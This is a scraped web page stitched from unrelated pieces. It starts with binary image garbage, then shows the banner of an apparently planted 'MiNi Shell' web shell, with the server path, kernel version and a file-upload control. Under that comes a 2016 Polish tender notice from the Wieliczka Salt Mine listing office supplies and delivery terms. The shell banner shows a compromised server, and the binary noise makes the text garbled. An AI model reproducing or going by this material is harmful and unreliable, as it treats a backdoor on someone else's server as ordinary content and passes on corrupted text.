JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/88144-N-2016.html

<p class="kh_header"><b>Wieliczka: Dostawa materiałów biurowych</b><br>
<b>Numer ogłoszenia: 88144 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 2787111, 12 2787132, faks 12 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna - Górnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sprzedaż wraz z dostarczeniem materiałów biurowych, w ilościach określonych w poniższej tabeli:
Lp	NAZWA	JEDNOST.	ILOŚĆ	OPIS
				
1	Papier ksero A4	ryza 
 1 ryza - 500 arkuszy 	4500	papier do urządzeń biurowych - drukarek atramentowych i laserowych, kserokopiarek oraz faksów. Do drukowania czarno-białego i w kolorze. Kopiowanie czarno białe 1 i 2 stronne. Gramatura papieru 80g/m2 , format A4 , biały, bezdrzewny , bezpyłowy , bezchlorowy i w kolorze białym - 166 wg skali CIE
2	Papier ksero A3	ryza 
 1 ryza - 500 arkuszy 100	papier do urządzeń biurowych-drukarek atramentowych laserowych,kserokopiarek. Do druku czarno-białego i w kolorze . Kopiowanie czarno-białe 1 i 2 stronne. Gramatura 80g/m2, format A3. Papier bezdrzewny, bezpyłowy, bezchlorowy i w kolorze białym -166 wg skali CIE
3	Papier A 0	rolki	10	papier do maszyn wielkoformatowych, kopiujący, druk czarno-biały i w kolorze , wym. w rolkach o szer. 841mm , format A0, gramatura 75/80g/m,papier bezdrzewny, bezpyłowy, bezchlorowy i w kolorze białym , dł 175mb
4	Blok z makulatury A4	szt	100	Blok z miękką okładką, w kratkę, papier biały gramatura 60g/m2, klejony na górze, 100 kartkowy
5	Blok z makulatury A5	szt		50
	Blok z miękką okładką, w kratkę, papier biały gramatura 60g/m2, klejony na górze, 100 kartkowy
6	Blok z makulatury A6	szt	50	Blok z miękką okładką, w kratkę, papier biały gramatura 60g/m2, klejony na górze, 50 kartkowy
7	Cienkopis	Szt	500	o grubości końcówki 0,4mm, końcówka oprawiona w metal, zabezpieczenie przeciw wysychaniu tuszu ,w kolorach : czarny, czerwony, zielony, niebieski
8	Cienkopisy w kompletach po 6szt.	kpl	150	cienkopis typu Stabilo Point 88 Fine 0,4 lub równoznaczny , z końcówką oprawioną w metal ,o grubości 0,4mm , tusz na bazie wody ,wentylowana skuwka zapobiegająca wysychaniu ,
 kolory : niebieski, czarny, czerwony, zielony, fioletowy, różowy
9	Cienkopis  kulkowy	szt	500	Cienkopis typu PILOT G-TEC C4 lub równoznaczny , z wymiennym wkładem żelowym, linia pisania 0,2 mm, 
długość linii minimum 1200 metrów , z tuszem polimerowym nie rozlewającym się przy pisaniu , kolory wkładów: czarny , niebieski , czerwony , zielony.
10	długopis żelowy	szt	500	O grubości końcówki 0,4mm-06mm z wymiennym wkładem w 4-ech kolorach: czarny , czerwony , zielony , niebieski ,  nie rozlewające się podczas pisania, nie wysychające
11	Długopis  	szt	600	Typu PILOT BL-G2 lub równoważny, z wymiennym wkładem o grubości pisania 0,25mm, długość linii pisania min. 1300m,
 z mechanizmem chowania wkładu, zabezpieczeniem przed poplamieniem ubrania
12	Długopis  	szt	600	Typu Pentel BK 77 SUPER B lub równoważny , z wymiennym wkładem o grubości 0,7mm , długość linii pisania min. 1700m , skuwka zabezpieczająca przed wysychaniem
13	długopis	szt	50	Typu Zenith lub równoważny, z wymiennym wkładem metalowym o grubości 1,0mm, długość linii pisania min. 1000m, obudowa z wytrzymałego tworzywa, z mechanizmem chowania wkładu
14	Dziurkacz
	szt	50	Możliwość dziurkowania jednorazowo 30 kartek, na 2 dziurki, metalowa stabilna podstawa z pojemnikiem na odpadki, ograniczniki formatu
15	Dziurkacz	szt	20	Możliwość dziurkowania jednorazowo 60 kartek, na 2 dziurki, metalowa stabilna podstawa z pojemnikiem na odpadki, ograniczniki formatu
16	Etykiety samoprzylepne
	opak.	50	Do drukarek laserowych,  format A4 , ilość etykiet na arkuszu -1, tylna kartka zabezpieczająca etykietę dzielona, w opakowaniu 100szt
17	Folia do laminowania
	opak.	50	Format A3, przejrzysta, z połyskiem, grubość folii 2x100mic, w opakowaniu 100szt
18	Folia do laminowania	opak.	50	Format A4, przejrzysta, z połyskiem, grubość folii 2x125mic, w opakowaniu 100szt

19	Folia do laminowania	opak.	25	Format A6, przejrzysta, z połyskiem, grubość folii 2x125mic, w opakowaniu 100szt
20	Gąbka do tablic 	Szt	20	Gąbka do tablic suchościeralnych, posiadająca warstwę magnetyczną umożliwiająca przytwierdzenie jej do tablic
21	Grafit do ołówka automatycznego	opak.	50	HB 0,5mm odporny na uciskanie, grubość 0,5mm
22	Grzbiety do bindowania	opak.	60	Do zastosowania przy dokumentach formatu A4, różne grubości: 10;12;16;20;25, 50 po 10 opakowań każdego rozmiaru , w opakowaniu po 100 szt.
23	Listwy zaciskowe	Opak	40	Do zastosowania przy dokumentach formatu A4, różne grubości : 3 ;6 ;9 ;12 po 10 opak. każdego rozmiaru w opakowaniach po 100 szt.
24	Gumka do mazania 
	szt	100	Do mazania ołówka, nie pozostawiająca śladów
25	Kalka maszynowa, ołówkowa
	opak.	10	Format A4 - kolor czarny po 50 szt. w opakowaniu
26	Karteczki -bloczki samoprzylepne
	bl	600	Kolorowe karteczki samoprzylepne , wymiar 85x85mm, w bloczku 400 szt
27	Karteczki - wkład do kubika  
	bl	100	klejone z 1 strony , kolorowe , wymiar 85x85mm , w bloczku 400 szt
 28	Karteczki - wkład do kubika   	bl	100	nie klejone ,kolorowe , wymiar 85x85mm , w bloczku 400 szt
29	Klej
	szt	100	klej biurowy w sztyfcie , nietoksyczny , o pojemności minim. 20g
30	Kołonotatnik
	szt	100	Format A4, w kratkę , okładka półtwarda , posiadający mikroperforację , z możliwością wpięcia do segregatora - 4 otwory , 100 kartek
31	Kołonotatnik	szt	100	Format A5, w kratkę , okładka półtwarda , posiadający mikroperforację , z możliwością wpięcia do segregatora - 4 otwory , 100 kartek
32	Koperta  C6	szt	10.000	Szara koperta na wypłatę, klejona na mokro na jednym krótkim boku, bez okienka
33	Koperta B4	szt	1.000	Koperta biała, samoklejąca, na krótkim boku, bez okienka
34	Koperta B5	szt	1.500	Koperta biała samoklejąca na krótkim boku, bez okienka
35	Koperta C4	szt	2.500	Koperta biała ,samoklejąca na krótkim boku, bez okienka
36	Koperta C5	szt	3.000	Koperta biała, samoklejąca, klejona na krótkim boku ,bez okienka
37	Koperta listowa C6	szt	10.000	Koperta biała samoklejąca na dłuższym boku bez okienka
38	Koperty na CD	Szt	500	Koperty białe z okienkiem
39	Koperty bezpieczne
	Szt	5.000	Koperty bezpieczne - tajne - samoklejące, wykonane z folii PE z czarnym poddrukiem i zamknięciem samoklejącym, które uwidacznia próby otwarcia, rozmiar kopert 185 x 255mm 
40	Korektor w piórze
	szt	200	Szybkoschnący, z metalową końcówką zapewniającą precyzyjność korygowania , pojemność  10ml, nietoksyczny
41	Korektor w taśmie	szt	200	Typu PRITT ROLLER lub równoznaczny , szerokość taśmy 4,2 mm,  długość taśmy 8,5 mb , nietoksyczny , niewidoczny na fotokopii
42	Korektor w taśmie	szt	100	Typu PRITT ROLLER lub równoznaczny , szerokość taśmy 8,4 mm,  długość taśmy 14mb mb , nietoksyczny , niewidoczny na fotokopii  
43	Koszulka na dokumenty
	opak.	100	Krystaliczna folia o grubości do 50 mikronów , o dużej przejrzystości, format A4, możliwość wpięcia do  segregatora, otwierana od góry; opakowanie a-100 szt
44	Koszulka na dokumenty	opak.	500	/Groszek/ format A4 przezroczysta, wykonana z folii o grubości do 80 mikronów , możliwość wpięcia do segregatora, otwierana od góry; opakowanie a-100 szt
45	Koszulka na dokumenty
	opak.	50	format A5 , przezroczysta ,wykonana z folii o grubości 65 mikronów, możliwość wpięcia do segregatora, otwierana od góry , opakowanie a-100 szt.
46	Koszulki na dokumenty z klapką 
	Opak	500	100mic.,wzmocnione brzegi, przeźroczysta, boczna klapka zabezpieczająca dokumenty przed wypadnięciem, multiperforowana pasująca do każdego segregatora, mieszcząca do 50 kartek form. A4 o gramaturze 80g/m2, w opakowaniu 10 szt.
47	Kreda 	opak.	30	Biała  kreda do tablicy ( 20szt w opakowaniu)
48	Linijka	szt	30	Z przezroczystego tworzywa o długości : 20cm i 30cm,
49	Notes 	szt	100	Format A6, kartki białe w kratkę, twarda oprawa , szyty, 96 kartek
50	Nożyczki	szt	50	Wielkość około 25cm, do ogólnego zastosowania, uchwyty wzmocnione,
51	Ofertówka

	szt	1250	Format A4, otwierane z boku i od góry, sztywna przezroczysta folia, grubości 200 mikronów ;opakowanie a-25szt
52	Ofertówka	szt	100	Folia PVC, przód i tył twardy przezroczysty, format A4, możliwość wpięcia do  segregatora, typ L otwierane z boku  i od góry, zaokrąglony górny prawy róg
53	Okładka do oprawiania dokumentów  ostatnia strona	opak.	30	Format A4, okładka kartonowa , jednostronnie powlekana , o grubości 230g/m2, w różnych kolorach , twarda , opakowanie a-100szt
54	Okładka do oprawiania dokumentów  pierwsza strona opak.	30	Format A4, okładka PCV , przezroczysta  0,20 mm , opakowanie a-100szt
55	Ołówek	szt	100	Ołówek drewniany , HB, odporność grafitu na złamania podczas upadku  
56	Ołówek automatyczny	szt	100	Ołówek 0,5mm, trwała obudowa, z gumowym uchwytem , metalowa końcówka z gumką  odporna na upadek
57	Pianka do czyszczenia obudowy komp.	Szt	50	pianka do czyszczenia obudowy plastikowej komputera , antystatyczna , w pojemnikach o pojemności 400
58	Płyn do czyszczenia ekranów	Szt	50	Płyn do czyszczenia powierzchni szklanych monitory komp., ekrany komp. przenośnych, antystatyczny, w pojemniku o pojemności 250 ml
59	Ściereczki czyszczące sprzęt komp.	Szt	50	Ściereczki nasączone preparatem antystatycznym, czyszczące powierzchnie plastikowe, metalowe i laminowane, pojemnik zawierający min.100 szt

60	Sprężone powietrze
	Szt	100	Przeznaczone do czyszczenia z kurzu miejsc trudnodostępnych w klawiaturach, komputerach, posiadająca wydłużenie dyszy, w pojemnikach o pojemności 400ml

61	Pinezki	opak.	50	Metalowe, w opakowaniu 50 szt
				
62	Pióro kulkowe
 	szt	50	Typu PENTEL lub równoznaczne  obudowa plastikowa, z końcówką ze stali nierdzewnej, pióro na wkłady wymienne z tuszem szybko wysychającym - nie brudzącym rąk, grubość linii pisania 0,35mm, długość linii pisani min. 550m.
63	Marker szybkoschnący	Szt	250	Marker typu Edding 300 lub równoznaczny szybkoschnący, piszący po każdej powierzchni, wodoodporny, odporny na ścieranie, z funkcją zapobiegającą wysychaniu końcówki, grubość linii pisania 1,3m- 3mm,  czarny
64	Marker szybkoschnący	Szt	50	Marker typu Edding 791 lub równoznaczny szybkoschnący, piszący po każdej powierzchni, wodoodporny, odporny  na ścieranie, z funkcją zapobiegającą wysychaniu końcówki, grubość linii pisania około 1 - 2mm,   biały
65	Pisak 	szt	30	Do pisania po folii PCV, powierzchniach poliestrowych  , wyposażony w gumkę do ścierania , kolor czarny ,końcówka o grubości 0,4mm i 0,6 mm
66	Markery do tablic	kpl	30	komplet kolorowych markerów do tablic suchościeralnych , z gąbką , nie rysujący powierzchni tablicy , końcówka okrągła o grubości 4,0mm , w  4 kolorach
67	Pisak do płyt CD	szt	100	Pisak do opisywania płyt CD, wyposażony w końcówkę miękką o średnicy 1,0mm, szybkoschnący i niezmywalny tusz o neutralnym zapachu , kolor czarny
68	Marker lakierowy	szt	350	typu Edding 750 lub równoznaczny, z tuszem bez dodatku toluenu i ksylenu , wyposażony w system kontroli dopływu tuszu do końcówki , mający zastosowanie na  każdej powierzchni , grubość linii pisania około 2-4mm, kolor biały i czarny
69	Pisaki w komp. po 6 szt.	kpl	50	Pisaki kolorowe , nietoksyczne, uniwersalne, odporne na wysychanie
70	Płyta CDRW	szt	2.000	700MB
71	Płyta DVD	szt	1.000	 Pojemność 8,5 GB , podwójna struktura  , kompatybilna z wszystkimi odtwarzaczami DVD
72	Podajnik na taśmę klejącą biurową	szt	20	Z ostrzem do ucinania taśmy klejącej , stabilny, wytrzymały na pęknięcia do ustawienia na biurku 
73	Pojemnik na karteczki kolorowe-kostka
	szt	20	Pojemnik plastikowy na biurko, trwały
74	Pojemnik na spinacze
	szt	20	Z tworzywa przezroczystego , z magnesem, trwały, na biurko , o pojemności min. 100 spinaczy
75	Przybornik na biurko
	szt	20	Plastikowy, zawierający miejsce na kartki, długopisy, spinacze itp..wymiar : dł. 105 x szer.155 x wys. 102 mm
76	Przekładki do segregatora	Op	100	Format A4, kartonowe, numeryczne i alfabetyczne, specjalnie wzmocnione kolorowe indeksy, z kartą informacyjno opisową, pasujące do każdego segregatora
77	Rozszywacz
	szt	50	rozszywacz do łatwego usuwania zszywek z dokumentów
78	Segregator	szt	400	Format A4, trwały sztywny, wykonany z kartonu pokrytego polipropylenem , z mechanizmem dźwigniowym, wzmacniane krawędzie, z dwustronną opisową etykietą wymienną, szerokość grzbietu 75 mm , w różnych kolorach
79	Segregator	szt	300	Format A4, trwały sztywny, wykonany z kartonu pokrytego polipropylenem , z mechanizmem dźwigniowym, wzmacniane krawędzie, z dwustronną opisową etykietą wymienną, szerokość grzbietu 50mm , w różnych kolorach
80	Segregator	szt	100	Format A5, trwały sztywny, wykonany z kartonu pokrytego polipropylenem , z mechanizmem dźwigniowym, wzmacniane krawędzie, z dwustronną opisową etykietą wymienną, szerokość grzbietu 75mm , w różnych kolorach
81	Skoroszyt 
	szt	4.000	Format A4, wykonany z PCV z możliwością wpięcia do segregatora, przednia okładka przezroczysta, tylna kolorowa, wysuwany pasek do opisu, różne kolory
82	Skoroszyt oczkowy
	szt	200	Format A4 , tekturowy , wykonane z kartonu 280g/m2, z możliwością wpięcia do segregatora
83	Skorowidz
	szt	50	Format A4, twarda oprawa, szyty , alfabetyczny , a 96 kartek
84	Skorowidz 	szt	20	Format A5, twarda oprawa, szyty, alfabetyczny , a 96 kartek
85	Spinacze
	opak.	300	Metalowe, trwałe, niełamliwe, 28mm, w opakowaniu 100szt
86	Spinacze	opak.	100	Metalowe, trwałe, niełamliwe, 50mm, w opakowaniu 100szt
87	szuflada na dokumenty 	szt	50	Półka na dokumenty formatu A4, trwała, plastikowa, przezroczysta , na biurko z możliwością ustawiania jednej na drugiej , wym. dł. 343 x szer. 253 x wys. 61mm
88	Taśma do drukarek - rozmiar 6
	szt	50	Do drukarek  DYMO ,taśma biało-czarna,niebiesko-czarna, czerwono-czarna, zielono-czarna, żółto-czarna, biało-niebieska, biało-czerwona  
89	Taśma do drukarek -  rozmiar 9	szt	50	Do drukarek  DYMO, taśma biało-czarna, niebiesko-czarna, czerwono-czarnat, zielono-czarna, żółto-czarna, biało-niebieska, biało-czerwona
90	Taśma do drukarek -  rozmiar 12	szt	50	Do drukarek  DYMO ,taśma biało-czarna, niebiesko-czarna, zielono-czarna, żółto-czarna, biało-niebieska, biało-czerwona  
91	Taśma do drukarek -  rozmiar 19	szt	50	Do drukarek  DYMO ,taśma biało-czarna, niebiesko-czarna, żółto-czarna, biało-niebieska, biało-czerwona  
92	Taśma klejąca	szt	200	Taśma biurowa klejąca  o szerokości około 19mm, przezroczysta,
93	Teczka do podpisu
	szt	100	W twardej, trwałej oprawie,  20 kartek z jednym otworem na środku strony, format A4
94	Teczka kopertowa	szt	200	Format A4, z polipropylenu, kolorowa, zamykana  na gumkę,   z wewnętrznymi  skrzydełkami zabezpieczającymi przed wypadaniem dokumentów.
95	Teczka skrzydłowa	szt	100	Format A4, szerokość grzbietu do 40mm, wykonana z twardej i sztywnej tektury  2mm kolorowej,  powlekanej folią polipropylenową, zamykana  na gumkę z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów
96	Teczka z gumką	szt	1.000	Format A4, tekturowa, kolorowa, z grubej tektury, z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów.
97	Teczka plastikowa na gumkę	szt	500	Format A4, wykonana z PCV, zapinana na gumkę z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów
98	Teczka wiązana
	szt	4.000	Format A4, tekturowa,  biała z wewnętrznymi skrzydełkami zabezpieczającymi przed wypadaniem dokumentów
99	Deska z klipem A4
	szt	20	Z tworzywa sztucznego w środku z klipem przytrzymującym dokumenty
100	Tusz do pieczątek	szt	50	Czarny tusz do każdego rodzaju stempli , pojemniki 25 ml.
101		Wkład do cienkopisu	szt	100	Wkład do cienkopisu typu Pilot   G-TEC-C-4, z tuszem polimerowym , grubość końcówki 0,4mm , w kolorach :  niebieski, czarny, czerwony, zielony
102	Wkład do długopisu	szt	150	Wkład do długopisu Parker , metalowe , kolor czarny i niebieski 
103	Wkład do długopisu
	szt	100	Wkład do długopisu  Pentel BK 77 Super B , grubość końcówki 0,7mm , długość linii pisania 1700m , kolor niebieski
104	Wkład do długopisu	szt	50	Wkład do długopisu  Zenith , metalowy , kolor niebieski i czarny , dł. wkładu 9,5 cm
105	Wkład do długopisu żelowego 
	szt	200	Wkład do długopisu żelowego UNI UMN /152; 207/, grubość linii pisania : 0,3 i  0,4mm,  z tuszem światło i wodoodpornym , kolory : czerwony, czarny, niebieski, zielony
106	Wkład do pióra wiecznego
	szt	100	naboje do pióra wiecznego  PARKER , długość wkładu 7,2 cm, kolor : czarny , niebieski
107	Temperówka	szt	30	Do ołówków, kredek,
108	Zakładki indeksujące	kpl	200	Zakładki kolorowe, z możliwością robienia na nich zapisów, z możliwością wielokrotnego naklejania, łatwo usuwalne, wielkości około 20x50mm ,w kompletach  po min. 160szt.
109	Zakreślacz
	kpl	100	Pisak - zakreślacz tekstu,  fluorescencyjny, grubość linii 2,0 - 5,0 mm , różne kolory, w kompletach po 4szt
110	Zeszyt A4

	szt	100	Format A4, szyty , 200 kartek  w kratkę ,białego koloru, twarda oprawa laminowana,   gramatura60g/m2
111	Zeszyt A4	szt	150	Format A4, w kratkę, o gramaturze 60g/m2, szyty, twarda oprawa laminowana , 96 kartek  
112	Zeszyt A5	szt	150	Format A5, w kratkę, o gramaturze 60g/m2, szyty, twarda oprawa laminowana , 96 kartek  
113	Zeszyt B5	zst	50	Format B5, w kratkę, o gramaturze 60g/m2, szyty, twarda oprawa laminowana , 96 kartek  
114	Zszywacz
	szt	30	Zszywacz biurowy, możliwość zszywania jednorazowo około 30-40 kartek, trwała obudowa ,stabilna metalowa podstawa , antypoślizgowa plastikowa nakładka
115	Zszywacz	szt	20	Zszywacz biurowy, możliwość zszywania jednorazowo około 120 kartek, trwała obudowa, stabilna metalowa podstawa , antypoślizgowa plastikowa nakładka 
116	Zszywki	opak.	500	Do  wymienionego zszywacza biurowego z poz. 116, w opakowaniu 1000 szt
117	Zszywki	opak.	50	Do  wymienionego zszywacza biurowego z poz. 117 ,w opakowaniu 1000 szt
118	Druk OT
	bl	50	przyjęcie środka trwałego, format A5 , samokopiujący , 80 szt w bloczku
119	Druk zaświadczenie o zatrudnieniu	bl	50	Format A6 , 80 szt w bloczku
120	Druk zmiana miejsca użytkowania	bl	50	Format A6 ,samokopiujący , 80 szt w bloczku
121	Druk przepustka jednorazowa	bl	50	Format ? A6 ,80 szt. w bloczku
122	Druk polecenie przelewu	Bl	300	Format A6 / 1+3/ samokopiujący, 80 szt. W bloczku
123	Klipy do dokumentów	Op	120	Wykonane z metalu, zapewniające sprężystość, do spinania banknotów i dokumentów, w opakowaniach po 12 szt, w rozmiarach : 19;25;32;41 - po 30 opak.
124	Pudła archiwizacyjne 80 	Szt	100	bezkwasowe , posiadające certyfikatFSC, format A4, rozmiar 350 x 80 x 250
125	Pudła archiwizacyjne 100 
	Szt	300	bezkwasowe , posiadające certyfikatFSC, format A4, rozmiar 350 x 100 x 250
126	Pudła archiwizacyjne 150 	Szt	200	bezkwasowe , posiadające certyfikatFSC, format A4, rozmiar 350 x 150 x 250

UWAGA:	Zamawiający dopuszcza możliwość zaoferowania produktów równoważnych o parametrach nie gorszych od parametrów materiałów opisanych w powyższej tabeli. 
Jeżeli Wykonawca zaoferuje inny materiał powołując się, iż jest on równoważny przedstawionemu, obowiązany jest w załączniku nr 1 do oferty w kolumnie Produkt oferowany podać ten materiał oraz wykazać, że oferowany materiał spełnia wymagania określone przez Zamawiającego.
2.	W ramach maksymalnych ilości materiałów biurowych, określonych w tabeli w punkcie 1  Zamawiający zobowiązuje się do zakupu materiałów biurowych o wartości 60% maksymalnej ceny brutto, podanej w ofercie. Zakup pozostałej ilości materiałów biurowych o wartości 40% maksymalnej ceny brutto, podanej w ofercie, zależeć będzie od potrzeb Zamawiającego. Oznacza to że Zamawiający może zrezygnować z zakupu całości lub części materiałów biurowych o wartości 40% maksymalnej ceny brutto (prawo opcji).
3.	Warunki dostarczania materiałów biurowych
3.1	Materiały biurowe dostarczane będą przez Wykonawcę na zlecenie Zamawiającego, sukcesywnie, partiami, w okresie obowiązywania umowy, w rodzaju i w ilościach określonych przez Zamawiającego.
3.2	Zamawiający zlecać będzie dostarczanie przedmiotu umowy nie częściej niż 4 razy 
w miesiącu, w dni robocze (od poniedziałku do piątku), w godzinach między 7.00 a 14.00.
3.3	Wykonawca zobowiązany jest dostarczyć materiały biurowe do siedziby Zamawiającego w terminie do 3 dni roboczych, licząc od daty przekazania Wykonawcy zlecenia faksem lub pocztą e-mail. O przekazaniu zlecenia Zamawiający jednocześnie powiadomi Wykonawcę telefonicznie.
3.4	 O przygotowaniu zleconej dostawy Wykonawca jest zobowiązany powiadomić Zamawiającego telefonicznie, nie później niż na 1 dzień roboczy przed wymaganym terminem dostawy.
3.5	.	Do każdej dostawy winna być załączona faktura VAT.
3.6	.	Dostarczanie materiałów biurowych odbywać się będzie na koszt Wykonawcy.
Szczegółowe informacje dotyczące przedmiotu zamówienia i zasad jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 7 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
